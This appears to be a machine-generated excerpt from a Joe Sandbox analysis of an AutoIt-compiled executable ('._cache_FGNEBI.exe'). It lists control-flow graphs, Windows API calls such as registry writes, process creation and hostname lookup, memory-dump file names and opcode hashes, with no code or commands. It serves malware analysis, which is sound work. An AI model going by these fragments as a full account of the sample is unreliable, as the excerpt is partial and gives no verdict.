769->776 777 e027d5-e027da 769->777 770->690 775 e027bd-e027c1 770->775 775->732 776->690 776->732 779 e02815 777->779 780 e027dc-e027e2 777->780 779->717 780->723
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • GetForegroundWindow.USER32 ref: 00D91FBE
                                                                                                                        • IsWindow.USER32(?), ref: 00E0282E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                        • API String ID: 3828923867-1919597938
                                                                                                                        • Opcode ID: 7b7899761ce4ba5b51e12b1de1a6c4b0a8ed12ef71c9c54dca9902e9fa87093c
                                                                                                                        • Instruction ID: 839338eeb21bb8f49dddd84289ff4f3e19a498e807a6d7f8a965b8e531edc9fe
                                                                                                                        • Opcode Fuzzy Hash: 7b7899761ce4ba5b51e12b1de1a6c4b0a8ed12ef71c9c54dca9902e9fa87093c
                                                                                                                        • Instruction Fuzzy Hash: 56D1F770104602DFCB08EF60D885AA9BBE1FF54344F149A2DF656675E1CB30E999CBB2

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 782 df352a-df3569 call d9d3d2 * 3 789 df356b-df356e 782->789 790 df3574-df35e7 call d984a6 call df3d7b call df3af7 782->790 789->790 792 df35f9-df360d call da2570 789->792 804 df35e9-df35f4 call ddd7e4 790->804 805 df3612-df3617 790->805 798 df3a94-df3ab7 call d95cd3 * 3 792->798 804->792 808 df366d 805->808 809 df3619-df362e RegConnectRegistryW 805->809 811 df3671-df369c RegCreateKeyExW 808->811 812 df3667-df366b 809->812 813 df3630-df3662 call d97ba9 call ddd7e4 call da2570 809->813 815 df369e-df36d2 call d97ba9 call ddd7e4 call da2570 811->815 816 df36e7-df36ec 811->816 812->811 813->798 815->798 840 df36d8-df36e2 RegCloseKey 815->840 818 df3a7b-df3a8c RegCloseKey 816->818 819 df36f2-df3715 call d984a6 call db1bc7 816->819 818->798 822 df3a8e-df3a92 RegCloseKey 818->822 835 df3717-df376d call d984a6 call db18fb call d984a6 * 2 RegSetValueExW 819->835 836 df3796-df37b6 call d984a6 call db1bc7 819->836 822->798 835->818 861 df3773-df3791 call d97ba9 call da2570 835->861 847 df37bc-df3814 call d984a6 call db18fb call d984a6 * 2 RegSetValueExW 836->847 848 df3840-df3860 call d984a6 call db1bc7 836->848 840->798 847->818 878 df381a-df383b call d97ba9 call da2570 847->878 862 df3949-df3969 call d984a6 call db1bc7 848->862 863 df3866-df38c9 call d984a6 call db010a call d984a6 call d93b1e 848->863 879 df3a74 861->879 884 df396b-df398b call d9cdb4 call d984a6 862->884 885 df39c6-df39e6 call d984a6 call db1bc7 862->885 898 df38cb-df38d0 863->898 899 df38e9-df3918 call d984a6 RegSetValueExW 863->899 878->818 879->818 907 df398d-df39a1 RegSetValueExW 884->907 904 df39e8-df3a0e call d9d00b call d984a6 885->904 905 df3a13-df3a30 call d984a6 call db1bc7 885->905 902 df38d8-df38db 898->902 903 df38d2-df38d4 898->903 917 df393d-df3944 call db017e 899->917 918 df391a-df3936 call d97ba9 call da2570 899->918 902->898 908 df38dd-df38df 902->908 903->902 904->907 929 df3a67-df3a71 call da2570 905->929 930 df3a32-df3a60 call ddbe47 call d984a6 call ddbe8a 905->930 907->818 912 df39a7-df39c1 call d97ba9 call da2570 907->912 908->899 915 df38e1-df38e5 908->915 912->879 915->899 917->818 918->917 929->879 930->929
                                                                                                                        APIs
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF3626
                                                                                                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,00E2DBF0,00000000,?,00000000,?,?), ref: 00DF3694
                                                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DF36DC
                                                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DF3765
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00DF3A85
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00DF3A92
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 536824911-966354055
                                                                                                                        • Opcode ID: c473b6842045427a07234ca2e763b51ea8295010172bfb5b053800d75be2e936
                                                                                                                        • Instruction ID: 5b475832e4b244f06b504a174246a19cbda01281545c63a6989d19712ce6664d
                                                                                                                        • Opcode Fuzzy Hash: c473b6842045427a07234ca2e763b51ea8295010172bfb5b053800d75be2e936
                                                                                                                        • Instruction Fuzzy Hash: 27027C756046019FCB14EF29C891E2AB7E5FF89724F06845DF98AAB361DB30ED01CB61

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00000000,00000001,00000000), ref: 00D9428C
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                          • Part of subcall function 00DB1BC7: __wcsicmp_l.LIBCMT ref: 00DB1C50
                                                                                                                        • _wcscpy.LIBCMT ref: 00D943C0
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00E0214E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_FGNEBI.exe$CMDLINE$CMDLINERAW
                                                                                                                        • API String ID: 861526374-2832358210
                                                                                                                        • Opcode ID: d331cd2ceab4ec4c99ec5d237ede78fdb69c1f638a2c51b76e436560f5c19a09
                                                                                                                        • Instruction ID: 87c0c78680ebba98bf04b690b96a4aec44ba301bcebf357efa2ac1c5e5553175
                                                                                                                        • Opcode Fuzzy Hash: d331cd2ceab4ec4c99ec5d237ede78fdb69c1f638a2c51b76e436560f5c19a09
                                                                                                                        • Instruction Fuzzy Hash: D7818176800219AACF05EBE5DD52EEFB7B8EF05350F600459E541B7082EF706A49CBB1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00DAEA39
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DAEA56
                                                                                                                          • Part of subcall function 00DB297D: __wsplitpath_helper.LIBCMT ref: 00DB29BD
                                                                                                                        • _wcsncat.LIBCMT ref: 00DAEA69
                                                                                                                        • __makepath.LIBCMT ref: 00DAEA85
                                                                                                                          • Part of subcall function 00DB2BFF: __wmakepath_s.LIBCMT ref: 00DB2C13
                                                                                                                          • Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
                                                                                                                          • Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153
                                                                                                                        • _wcscpy.LIBCMT ref: 00DAEABE
                                                                                                                          • Part of subcall function 00DAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00DAEADA,?,?), ref: 00DAEB27
                                                                                                                        • _wcscat.LIBCMT ref: 00E032FC
                                                                                                                        • _wcscat.LIBCMT ref: 00E03334
                                                                                                                        • _wcsncpy.LIBCMT ref: 00E03370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                        • String ID: Include$\$"
                                                                                                                        • API String ID: 1213536620-2474423117
                                                                                                                        • Opcode ID: dc0fa9d067a3a00403256614acf113ee3c3ec29cad25766903c5b96b92bcb2b0
                                                                                                                        • Instruction ID: 9378b747d1200e2cf41c20ae6e4fbaba183c922ee1054b2759de77ffb6778a6c
                                                                                                                        • Opcode Fuzzy Hash: dc0fa9d067a3a00403256614acf113ee3c3ec29cad25766903c5b96b92bcb2b0
                                                                                                                        • Instruction Fuzzy Hash: 13518EB64043419FC708EF6AEC85CA7B7E8FB4A301F40491EF645A7261EB749648CB76

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1143 dd78ee-dd7911 WSAStartup 1144 dd7917-dd7938 gethostname gethostbyname 1143->1144 1145 dd79b1-dd79bd call db1943 1143->1145 1144->1145 1146 dd793a-dd7941 1144->1146 1154 dd79be-dd79c1 1145->1154 1148 dd794e-dd7950 1146->1148 1149 dd7943 1146->1149 1152 dd7961-dd79a6 call dafaa0 inet_ntoa call db3220 call dd8553 call db1943 call db017e 1148->1152 1153 dd7952-dd795f call db1943 1148->1153 1151 dd7945-dd794c 1149->1151 1151->1148 1151->1151 1159 dd79a9-dd79af WSACleanup 1152->1159 1153->1159 1159->1154
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                        • String ID: 0.0.0.0
                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                        • Opcode ID: e744a61666f4d527e672169d383c16319d28e98e1f53e483a9a9b9e6f3dcd424
                                                                                                                        • Instruction ID: e2a1a8583c008d4e7b9dd088b5eb9933c3276c237cd02eb4ff95ce347c1573c7
                                                                                                                        • Opcode Fuzzy Hash: e744a61666f4d527e672169d383c16319d28e98e1f53e483a9a9b9e6f3dcd424
                                                                                                                        • Instruction Fuzzy Hash: 3911E772908125AFDB24AB709C5AEDE776CDF01720F0440A7F456A6191FF70DB858A70

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00D930B0
                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00D930BF
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00D930D5
                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00D930E7
                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00D930F9
                                                                                                                          • Part of subcall function 00D9318A: LoadImageW.USER32(00D90000,00000063,00000001,00000010,00000010,00000000), ref: 00D931AE
                                                                                                                        • RegisterClassExW.USER32(?), ref: 00D93167
                                                                                                                          • Part of subcall function 00D92F58: GetSysColorBrush.USER32(0000000F), ref: 00D92F8B
                                                                                                                          • Part of subcall function 00D92F58: RegisterClassExW.USER32(00000030), ref: 00D92FB5
                                                                                                                          • Part of subcall function 00D92F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D92FC6
                                                                                                                          • Part of subcall function 00D92F58: LoadIconW.USER32(000000A9), ref: 00D93009
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                        • API String ID: 2880975755-4155596026
                                                                                                                        • Opcode ID: 63465be8be27e4b8943364d3e789fd47917c6d1daeb6b92dd994b4f67f450853
                                                                                                                        • Instruction ID: d9c7c115f3d72ec16ea4699216203f91bc5064398d2943c737253d5ebf8071b6
                                                                                                                        • Opcode Fuzzy Hash: 63465be8be27e4b8943364d3e789fd47917c6d1daeb6b92dd994b4f67f450853
                                                                                                                        • Instruction Fuzzy Hash: FF2131B0D45304AFCB04DFAAED49B9DBBF5EB48311F0049AAE614B22E0D77549488FA1

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1342 deb74b-deb7ac VariantInit call d9ca8e CoInitialize 1345 deb7ae CoUninitialize 1342->1345 1346 deb7b4-deb7c7 call dad5f6 1342->1346 1345->1346 1349 deb7c9-deb7d0 call d9ca8e 1346->1349 1350 deb7d5-deb7dc 1346->1350 1349->1350 1352 deb7de-deb805 call d984a6 call dca857 1350->1352 1353 deb81b-deb85b call d984a6 call daf885 1350->1353 1352->1353 1362 deb807-deb816 call dec235 1352->1362 1363 deb9d3-deba17 SetErrorMode CoGetInstanceFromFile 1353->1363 1364 deb861-deb86e 1353->1364 1379 debad0-debae3 VariantClear 1362->1379 1368 deba1f-deba3a CoGetObject 1363->1368 1369 deba19-deba1d 1363->1369 1366 deb8a8-deb8b6 GetRunningObjectTable 1364->1366 1367 deb870-deb881 call dad5f6 1364->1367 1371 deb8b8-deb8c9 1366->1371 1372 deb8d5-deb8e8 call dec235 1366->1372 1387 deb883-deb88d call d9cdb4 1367->1387 1388 deb8a0 1367->1388 1375 deba3c 1368->1375 1376 debab5-debac5 call dec235 SetErrorMode 1368->1376 1374 deba40-deba47 SetErrorMode 1369->1374 1392 deb8ed-deb8fc 1371->1392 1393 deb8cb-deb8d0 1371->1393 1389 debac7-debacb call d95cd3 1372->1389 1378 deba4b-deba51 1374->1378 1375->1374 1376->1389 1383 debaa8-debaab 1378->1383 1384 deba53-deba55 1378->1384 1383->1376 1390 deba8d-debaa6 call dda6f6 1384->1390 1391 deba57-deba78 call dcac4b 1384->1391 1387->1388 1402 deb88f-deb89e call d9cdb4 1387->1402 1388->1366 1389->1379 1390->1389 1391->1390 1404 deba7a-deba83 1391->1404 1401 deb907-deb91b 1392->1401 1393->1372 1407 deb9bb-deb9d1 1401->1407 1408 deb921-deb925 1401->1408 1402->1366 1404->1390 1407->1378 1408->1407 1410 deb92b-deb940 1408->1410 1413 deb9a2-deb9ac 1410->1413 1414 deb942-deb957 1410->1414 1413->1401 1414->1413 1418 deb959-deb983 call dcac4b 1414->1418 1422 deb994-deb99e 1418->1422 1423 deb985-deb98d 1418->1423 1422->1413 1424 deb98f-deb990 1423->1424 1425 deb9b1-deb9b6 1423->1425 1424->1422 1425->1407
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00DEB777
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00DEB7A4
                                                                                                                        • CoUninitialize.COMBASE ref: 00DEB7AE
                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00DEB8AE
                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DEB9DB
                                                                                                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00DEBA0F
                                                                                                                        • CoGetObject.OLE32(?,00000000,00E1D91C,?), ref: 00DEBA32
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00DEBA45
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DEBAC5
                                                                                                                        • VariantClear.OLEAUT32(00E1D91C), ref: 00DEBAD5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395222682-0
                                                                                                                        • Opcode ID: 88041099075e25b6a30ac199268b376203a67c3396d259c03dc2b75db645b40c
                                                                                                                        • Instruction ID: d94bd3e98c7abf109ed707f3a696c99d41304eafb7eb4e90abf5224e5fb8cc19
                                                                                                                        • Opcode Fuzzy Hash: 88041099075e25b6a30ac199268b376203a67c3396d259c03dc2b75db645b40c
                                                                                                                        • Instruction Fuzzy Hash: 77C12571608345AFC700EF69C88496BB7E9FF89318F04492EF58A9B251DB71ED05CB62

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00D92F8B
                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00D92FB5
                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D92FC6
                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00D93009
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                        • API String ID: 975902462-1005189915
                                                                                                                        • Opcode ID: 6d1bd5ff66fae90613c8dce659139665d18ba72cb23a8830799c558b54b28030
                                                                                                                        • Instruction ID: 04ec9c4ffed42b528546b57be68af408218315fbc6a029ccbb12e0eb385b8480
                                                                                                                        • Opcode Fuzzy Hash: 6d1bd5ff66fae90613c8dce659139665d18ba72cb23a8830799c558b54b28030
                                                                                                                        • Instruction Fuzzy Hash: 9E21EFB5904318AFDB149FA6EC89BCEBBB4FB08701F00855AF611B62A0D7B40548CF91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1431 df23c5-df2426 call db1970 1434 df2428-df243b call d9cdb4 1431->1434 1435 df2452-df2456 1431->1435 1446 df243d-df2450 call d9cdb4 1434->1446 1447 df2488 1434->1447 1436 df249d-df24a3 1435->1436 1437 df2458-df2468 call d9cdb4 1435->1437 1441 df24b8-df24be 1436->1441 1442 df24a5-df24a8 1436->1442 1450 df246b-df2484 call d9cdb4 1437->1450 1443 df24c8-df24e2 call d984a6 call d93bcf 1441->1443 1444 df24c0 1441->1444 1448 df24ab-df24b0 call d9cdb4 1442->1448 1464 df24e8-df2541 call d984a6 call d93bcf call d984a6 call d93bcf call d984a6 call d93bcf 1443->1464 1465 df25a1-df25a9 1443->1465 1444->1443 1446->1450 1451 df248b-df248f 1447->1451 1448->1441 1450->1436 1463 df2486 1450->1463 1456 df2499-df249b 1451->1456 1457 df2491-df2497 1451->1457 1456->1436 1456->1441 1457->1448 1463->1451 1511 df256f-df259f GetSystemDirectoryW call db010a GetSystemDirectoryW 1464->1511 1512 df2543-df255e call d984a6 call d93bcf 1464->1512 1466 df25ab-df25c6 call d984a6 call d93bcf 1465->1466 1467 df25d3-df2601 GetCurrentDirectoryW call db010a GetCurrentDirectoryW 1465->1467 1466->1467 1481 df25c8-df25d1 call db18fb 1466->1481 1476 df2605 1467->1476 1479 df2609-df260d 1476->1479 1482 df260f-df2639 call d9ca8e * 3 1479->1482 1483 df263e-df264e call dd9a8f 1479->1483 1481->1467 1481->1483 1482->1483 1495 df26aa 1483->1495 1496 df2650-df269b call dda17a call dda073 call dda102 1483->1496 1500 df26ac-df26bb 1495->1500 1496->1500 1529 df269d-df26a8 1496->1529 1501 df274c-df2768 CreateProcessW 1500->1501 1502 df26c1-df26f1 call dcbc90 call db18fb 1500->1502 1508 df276b-df277e call db017e * 2 1501->1508 1525 df26fa-df270a call db18fb 1502->1525 1526 df26f3-df26f8 1502->1526 1532 df27bd-df27c9 CloseHandle 1508->1532 1533 df2780-df27b8 call ddd7e4 GetLastError call d97ba9 call da2570 1508->1533 1511->1476 1512->1511 1537 df2560-df2569 call db18fb 1512->1537 1540 df270c-df2711 1525->1540 1541 df2713-df2723 call db18fb 1525->1541 1526->1525 1526->1526 1529->1500 1534 df27cb-df27f0 call dd9d09 call dda37f call df2881 1532->1534 1535 df27f5-df27f9 1532->1535 1548 df283e-df284f call dd9b29 1533->1548 1534->1535 1542 df27fb-df2805 1535->1542 1543 df2807-df2811 1535->1543 1537->1479 1537->1511 1540->1540 1540->1541 1561 df272c-df274a call db017e * 3 1541->1561 1562 df2725-df272a 1541->1562 1542->1548 1550 df2819-df2838 call da2570 CloseHandle 1543->1550 1551 df2813 1543->1551 1550->1548 1551->1550 1561->1508 1562->1561 1562->1562
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00DF23E6
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DF2579
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DF259D
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DF25DD
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DF25FF
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DF2760
                                                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DF2792
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00DF27C1
